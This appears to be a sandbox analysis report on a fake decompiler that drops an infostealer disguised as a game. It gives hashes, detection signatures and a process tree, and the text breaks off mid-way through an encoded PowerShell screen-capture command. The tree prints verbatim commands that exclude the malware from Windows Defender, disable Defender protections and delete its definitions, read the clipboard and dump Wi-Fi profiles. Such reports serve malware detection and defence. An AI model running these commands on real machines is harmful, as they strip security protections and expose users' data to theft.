c4ec24bfa071df98b46f849eb12d65e07878bd897f37b1d1e10c183f1549f243

Analysis

max time kernel
274s
max time network
276s
platform
windows11-21h2_x64
resource
win11-20240426-en
resource tags

arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system
submitted
10/05/2024, 15:15

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

Nova-Decompiler/Decompiler.exe
Size

15.9MB
MD5

75f9789a4f7b27dcb76e4b105e03aa3e
SHA1

fb37ee383ce031ad0e64fa06c3b9e454671f9b9f
SHA256

2bc97bfa5a19dfef73eaa69529ff054e4313f96d3c316bff4cc5ad261018d570
SHA512

fb33809fb7e8209995d6c036521a2fdedea507f3d18f1dfb63375fd7562aa54669e5dfaf459708bf41dae9f69307b379dd44956e3a25a87f9b1e7d5e3ebdf53c
SSDEEP

393216:fmc0gP8AxYDX1+TtIiFGMiP1gZY9Z8D8CclNET02O:f30bX71QtIWiP2a8DZcrL

Score

8^/10

execution pyinstaller spyware stealer

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
5444	powershell.exe
4104	powershell.exe

Executes dropped EXE 2 IoCs

pid	Process
3712	[🚪BACKROOMS] Pet Simulator 99!.exe
1576	[🚪BACKROOMS] Pet Simulator 99!.exe

Loads dropped DLL 36 IoCs

pid	Process
3268	Decompiler.exe
3268	Decompiler.exe
3268	Decompiler.exe
3268	Decompiler.exe
3268	Decompiler.exe
3268	Decompiler.exe
3268	Decompiler.exe
3268	Decompiler.exe
3268	Decompiler.exe
3268	Decompiler.exe
3268	Decompiler.exe
3268	Decompiler.exe
3268	Decompiler.exe
3268	Decompiler.exe
3268	Decompiler.exe
3268	Decompiler.exe
3268	Decompiler.exe
3268	Decompiler.exe
3268	Decompiler.exe
1576	[🚪BACKROOMS] Pet Simulator 99!.exe
1576	[🚪BACKROOMS] Pet Simulator 99!.exe
1576	[🚪BACKROOMS] Pet Simulator 99!.exe
1576	[🚪BACKROOMS] Pet Simulator 99!.exe
1576	[🚪BACKROOMS] Pet Simulator 99!.exe
1576	[🚪BACKROOMS] Pet Simulator 99!.exe
1576	[🚪BACKROOMS] Pet Simulator 99!.exe
1576	[🚪BACKROOMS] Pet Simulator 99!.exe
1576	[🚪BACKROOMS] Pet Simulator 99!.exe
1576	[🚪BACKROOMS] Pet Simulator 99!.exe
1576	[🚪BACKROOMS] Pet Simulator 99!.exe
1576	[🚪BACKROOMS] Pet Simulator 99!.exe
1576	[🚪BACKROOMS] Pet Simulator 99!.exe
1576	[🚪BACKROOMS] Pet Simulator 99!.exe
1576	[🚪BACKROOMS] Pet Simulator 99!.exe
1576	[🚪BACKROOMS] Pet Simulator 99!.exe
1576	[🚪BACKROOMS] Pet Simulator 99!.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
40	ip-api.com

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x000300000002a841-490.dat	pyinstaller

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2432	WMIC.exe

Enumerates processes with tasklist 1 TTPs 3 IoCs

Process Discovery

T1057

pid	Process
2500	tasklist.exe
3248	tasklist.exe
5504	tasklist.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
5456	systeminfo.exe

Kills process with taskkill 10 IoCs

evasion

pid	Process
2344	taskkill.exe
1428	taskkill.exe
3664	taskkill.exe
4296	taskkill.exe
5212	taskkill.exe
1412	taskkill.exe
5656	taskkill.exe
5936	taskkill.exe
5904	taskkill.exe
5956	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133598282923041318"	chrome.exe

Suspicious behavior: EnumeratesProcesses 23 IoCs

pid	Process
1840	chrome.exe
1840	chrome.exe
1840	chrome.exe
4104	powershell.exe
4104	powershell.exe
2112	powershell.exe
2112	powershell.exe
4104	powershell.exe
2112	powershell.exe
1588	powershell.exe
1588	powershell.exe
5444	powershell.exe
5444	powershell.exe
1588	powershell.exe
5444	powershell.exe
6100	powershell.exe
6100	powershell.exe
4896	powershell.exe
4896	powershell.exe
3648	powershell.exe
3648	powershell.exe
1232	powershell.exe
1232	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
1840	chrome.exe
1840	chrome.exe
1840	chrome.exe
1840	chrome.exe
1840	chrome.exe
1840	chrome.exe
1840	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1840	chrome.exe
Token: SeCreatePagefilePrivilege	1840	chrome.exe
Token: SeShutdownPrivilege	1840	chrome.exe
Token: SeCreatePagefilePrivilege	1840	chrome.exe
Token: SeShutdownPrivilege	1840	chrome.exe
Token: SeCreatePagefilePrivilege	1840	chrome.exe
Token: SeShutdownPrivilege	1840	chrome.exe
Token: SeCreatePagefilePrivilege	1840	chrome.exe
Token: SeShutdownPrivilege	1840	chrome.exe
Token: SeCreatePagefilePrivilege	1840	chrome.exe
Token: SeShutdownPrivilege	1840	chrome.exe
Token: SeCreatePagefilePrivilege	1840	chrome.exe
Token: SeShutdownPrivilege	1840	chrome.exe
Token: SeCreatePagefilePrivilege	1840	chrome.exe
Token: SeShutdownPrivilege	1840	chrome.exe
Token: SeCreatePagefilePrivilege	1840	chrome.exe
Token: SeShutdownPrivilege	1840	chrome.exe
Token: SeCreatePagefilePrivilege	1840	chrome.exe
Token: SeShutdownPrivilege	1840	chrome.exe
Token: SeCreatePagefilePrivilege	1840	chrome.exe
Token: SeShutdownPrivilege	1840	chrome.exe
Token: SeCreatePagefilePrivilege	1840	chrome.exe
Token: SeShutdownPrivilege	1840	chrome.exe
Token: SeCreatePagefilePrivilege	1840	chrome.exe
Token: SeShutdownPrivilege	1840	chrome.exe
Token: SeCreatePagefilePrivilege	1840	chrome.exe
Token: SeShutdownPrivilege	1840	chrome.exe
Token: SeCreatePagefilePrivilege	1840	chrome.exe
Token: SeShutdownPrivilege	1840	chrome.exe
Token: SeCreatePagefilePrivilege	1840	chrome.exe
Token: SeShutdownPrivilege	1840	chrome.exe
Token: SeCreatePagefilePrivilege	1840	chrome.exe
Token: SeShutdownPrivilege	1840	chrome.exe
Token: SeCreatePagefilePrivilege	1840	chrome.exe
Token: SeShutdownPrivilege	1840	chrome.exe
Token: SeCreatePagefilePrivilege	1840	chrome.exe
Token: SeShutdownPrivilege	1840	chrome.exe
Token: SeCreatePagefilePrivilege	1840	chrome.exe
Token: SeShutdownPrivilege	1840	chrome.exe
Token: SeCreatePagefilePrivilege	1840	chrome.exe
Token: SeShutdownPrivilege	1840	chrome.exe
Token: SeCreatePagefilePrivilege	1840	chrome.exe
Token: SeShutdownPrivilege	1840	chrome.exe
Token: SeCreatePagefilePrivilege	1840	chrome.exe
Token: SeShutdownPrivilege	1840	chrome.exe
Token: SeCreatePagefilePrivilege	1840	chrome.exe
Token: SeShutdownPrivilege	1840	chrome.exe
Token: SeCreatePagefilePrivilege	1840	chrome.exe
Token: SeShutdownPrivilege	1840	chrome.exe
Token: SeCreatePagefilePrivilege	1840	chrome.exe
Token: SeShutdownPrivilege	1840	chrome.exe
Token: SeCreatePagefilePrivilege	1840	chrome.exe
Token: SeShutdownPrivilege	1840	chrome.exe
Token: SeCreatePagefilePrivilege	1840	chrome.exe
Token: SeShutdownPrivilege	1840	chrome.exe
Token: SeCreatePagefilePrivilege	1840	chrome.exe
Token: SeShutdownPrivilege	1840	chrome.exe
Token: SeCreatePagefilePrivilege	1840	chrome.exe
Token: SeShutdownPrivilege	1840	chrome.exe
Token: SeCreatePagefilePrivilege	1840	chrome.exe
Token: SeShutdownPrivilege	1840	chrome.exe
Token: SeCreatePagefilePrivilege	1840	chrome.exe
Token: SeShutdownPrivilege	1840	chrome.exe
Token: SeCreatePagefilePrivilege	1840	chrome.exe

Suspicious use of FindShellTrayWindow 28 IoCs

pid	Process
1840	chrome.exe
1840	chrome.exe
1840	chrome.exe
1840	chrome.exe
1840	chrome.exe
1840	chrome.exe
1840	chrome.exe
1840	chrome.exe
1840	chrome.exe
1840	chrome.exe
1840	chrome.exe
1840	chrome.exe
1840	chrome.exe
1840	chrome.exe
1840	chrome.exe
1840	chrome.exe
1840	chrome.exe
1840	chrome.exe
1840	chrome.exe
1840	chrome.exe
1840	chrome.exe
1840	chrome.exe
1840	chrome.exe
1840	chrome.exe
1840	chrome.exe
1840	chrome.exe
1840	chrome.exe
1840	chrome.exe

Suspicious use of SendNotifyMessage 14 IoCs

pid	Process
1840	chrome.exe
1840	chrome.exe
1840	chrome.exe
1840	chrome.exe
1840	chrome.exe
1840	chrome.exe
1840	chrome.exe
1840	chrome.exe
1840	chrome.exe
1840	chrome.exe
1840	chrome.exe
1840	chrome.exe
1840	chrome.exe
1840	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4632 wrote to memory of 3268	4632	Decompiler.exe	82
PID 4632 wrote to memory of 3268	4632	Decompiler.exe	82
PID 1840 wrote to memory of 4448	1840	chrome.exe	87
PID 1840 wrote to memory of 4448	1840	chrome.exe	87
PID 1840 wrote to memory of 2784	1840	chrome.exe	88
PID 1840 wrote to memory of 2784	1840	chrome.exe	88
PID 1840 wrote to memory of 2784	1840	chrome.exe	88
PID 1840 wrote to memory of 2784	1840	chrome.exe	88
PID 1840 wrote to memory of 2784	1840	chrome.exe	88
PID 1840 wrote to memory of 2784	1840	chrome.exe	88
PID 1840 wrote to memory of 2784	1840	chrome.exe	88
PID 1840 wrote to memory of 2784	1840	chrome.exe	88
PID 1840 wrote to memory of 2784	1840	chrome.exe	88
PID 1840 wrote to memory of 2784	1840	chrome.exe	88
PID 1840 wrote to memory of 2784	1840	chrome.exe	88
PID 1840 wrote to memory of 2784	1840	chrome.exe	88
PID 1840 wrote to memory of 2784	1840	chrome.exe	88
PID 1840 wrote to memory of 2784	1840	chrome.exe	88
PID 1840 wrote to memory of 2784	1840	chrome.exe	88
PID 1840 wrote to memory of 2784	1840	chrome.exe	88
PID 1840 wrote to memory of 2784	1840	chrome.exe	88
PID 1840 wrote to memory of 2784	1840	chrome.exe	88
PID 1840 wrote to memory of 2784	1840	chrome.exe	88
PID 1840 wrote to memory of 2784	1840	chrome.exe	88
PID 1840 wrote to memory of 2784	1840	chrome.exe	88
PID 1840 wrote to memory of 2784	1840	chrome.exe	88
PID 1840 wrote to memory of 2784	1840	chrome.exe	88
PID 1840 wrote to memory of 2784	1840	chrome.exe	88
PID 1840 wrote to memory of 2784	1840	chrome.exe	88
PID 1840 wrote to memory of 2784	1840	chrome.exe	88
PID 1840 wrote to memory of 2784	1840	chrome.exe	88
PID 1840 wrote to memory of 2784	1840	chrome.exe	88
PID 1840 wrote to memory of 2784	1840	chrome.exe	88
PID 1840 wrote to memory of 2784	1840	chrome.exe	88
PID 1840 wrote to memory of 2784	1840	chrome.exe	88
PID 1840 wrote to memory of 2884	1840	chrome.exe	89
PID 1840 wrote to memory of 2884	1840	chrome.exe	89
PID 1840 wrote to memory of 2532	1840	chrome.exe	90
PID 1840 wrote to memory of 2532	1840	chrome.exe	90
PID 1840 wrote to memory of 2532	1840	chrome.exe	90
PID 1840 wrote to memory of 2532	1840	chrome.exe	90
PID 1840 wrote to memory of 2532	1840	chrome.exe	90
PID 1840 wrote to memory of 2532	1840	chrome.exe	90
PID 1840 wrote to memory of 2532	1840	chrome.exe	90
PID 1840 wrote to memory of 2532	1840	chrome.exe	90
PID 1840 wrote to memory of 2532	1840	chrome.exe	90
PID 1840 wrote to memory of 2532	1840	chrome.exe	90
PID 1840 wrote to memory of 2532	1840	chrome.exe	90
PID 1840 wrote to memory of 2532	1840	chrome.exe	90
PID 1840 wrote to memory of 2532	1840	chrome.exe	90
PID 1840 wrote to memory of 2532	1840	chrome.exe	90
PID 1840 wrote to memory of 2532	1840	chrome.exe	90
PID 1840 wrote to memory of 2532	1840	chrome.exe	90
PID 1840 wrote to memory of 2532	1840	chrome.exe	90
PID 1840 wrote to memory of 2532	1840	chrome.exe	90
PID 1840 wrote to memory of 2532	1840	chrome.exe	90
PID 1840 wrote to memory of 2532	1840	chrome.exe	90
PID 1840 wrote to memory of 2532	1840	chrome.exe	90
PID 1840 wrote to memory of 2532	1840	chrome.exe	90
PID 1840 wrote to memory of 2532	1840	chrome.exe	90
PID 1840 wrote to memory of 2532	1840	chrome.exe	90
PID 1840 wrote to memory of 2532	1840	chrome.exe	90
PID 1840 wrote to memory of 2532	1840	chrome.exe	90
PID 1840 wrote to memory of 2532	1840	chrome.exe	90

C:\Users\Admin\AppData\Local\Temp\Nova-Decompiler\Decompiler.exe
"C:\Users\Admin\AppData\Local\Temp\Nova-Decompiler\Decompiler.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4632
- C:\Users\Admin\AppData\Local\Temp\Nova-Decompiler\Decompiler.exe
  "C:\Users\Admin\AppData\Local\Temp\Nova-Decompiler\Decompiler.exe"
  2⤵
  - Loads dropped DLL
  PID:3268

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1840
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x10c,0x110,0x114,0xe8,0x118,0x7ffe1e60ab58,0x7ffe1e60ab68,0x7ffe1e60ab78
  2⤵
  PID:4448
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1588 --field-trial-handle=1828,i,14724747694263297086,10805590777698691401,131072 /prefetch:2
  2⤵
  PID:2784
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 --field-trial-handle=1828,i,14724747694263297086,10805590777698691401,131072 /prefetch:8
  2⤵
  PID:2884
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2204 --field-trial-handle=1828,i,14724747694263297086,10805590777698691401,131072 /prefetch:8
  2⤵
  PID:2532
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3056 --field-trial-handle=1828,i,14724747694263297086,10805590777698691401,131072 /prefetch:1
  2⤵
  PID:1384
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3140 --field-trial-handle=1828,i,14724747694263297086,10805590777698691401,131072 /prefetch:1
  2⤵
  PID:1148
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4300 --field-trial-handle=1828,i,14724747694263297086,10805590777698691401,131072 /prefetch:1
  2⤵
  PID:996
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4100 --field-trial-handle=1828,i,14724747694263297086,10805590777698691401,131072 /prefetch:8
  2⤵
  PID:4980
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4592 --field-trial-handle=1828,i,14724747694263297086,10805590777698691401,131072 /prefetch:8
  2⤵
  PID:2924
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4484 --field-trial-handle=1828,i,14724747694263297086,10805590777698691401,131072 /prefetch:8
  2⤵
  PID:3872
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4944 --field-trial-handle=1828,i,14724747694263297086,10805590777698691401,131072 /prefetch:8
  2⤵
  PID:1072
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4984 --field-trial-handle=1828,i,14724747694263297086,10805590777698691401,131072 /prefetch:8
  2⤵
  PID:3736
- C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe
  "C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --reenable-autoupdates --system-level
  2⤵
  PID:1180
- - C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe
    "C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x254,0x258,0x25c,0x230,0x260,0x7ff7a1c1ae48,0x7ff7a1c1ae58,0x7ff7a1c1ae68
    3⤵
    PID:956
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5024 --field-trial-handle=1828,i,14724747694263297086,10805590777698691401,131072 /prefetch:1
  2⤵
  PID:1140
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4936 --field-trial-handle=1828,i,14724747694263297086,10805590777698691401,131072 /prefetch:8
  2⤵
  PID:4628
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4488 --field-trial-handle=1828,i,14724747694263297086,10805590777698691401,131072 /prefetch:1
  2⤵
  PID:3752
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=3056 --field-trial-handle=1828,i,14724747694263297086,10805590777698691401,131072 /prefetch:1
  2⤵
  PID:3344
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=3444 --field-trial-handle=1828,i,14724747694263297086,10805590777698691401,131072 /prefetch:1
  2⤵
  PID:3612

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:2044

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1420

C:\Users\Admin\AppData\Local\Temp\Nova-Decompiler\games\[🚪BACKROOMS] Pet Simulator 99!.exe
"C:\Users\Admin\AppData\Local\Temp\Nova-Decompiler\games\[🚪BACKROOMS] Pet Simulator 99!.exe"
1⤵
- Executes dropped EXE
PID:3712
- C:\Users\Admin\AppData\Local\Temp\Nova-Decompiler\games\[🚪BACKROOMS] Pet Simulator 99!.exe
  "C:\Users\Admin\AppData\Local\Temp\Nova-Decompiler\games\[🚪BACKROOMS] Pet Simulator 99!.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:1576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nova-Decompiler\games\[🚪BACKROOMS] Pet Simulator 99!.exe'"
    3⤵
    PID:2924
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nova-Decompiler\games\[🚪BACKROOMS] Pet Simulator 99!.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    PID:4464
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4964
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:3196
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:1492
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:5292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    PID:4232
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1588
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:2448
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:5504
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3664
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    PID:5076
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      PID:5512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:1488
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:5456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0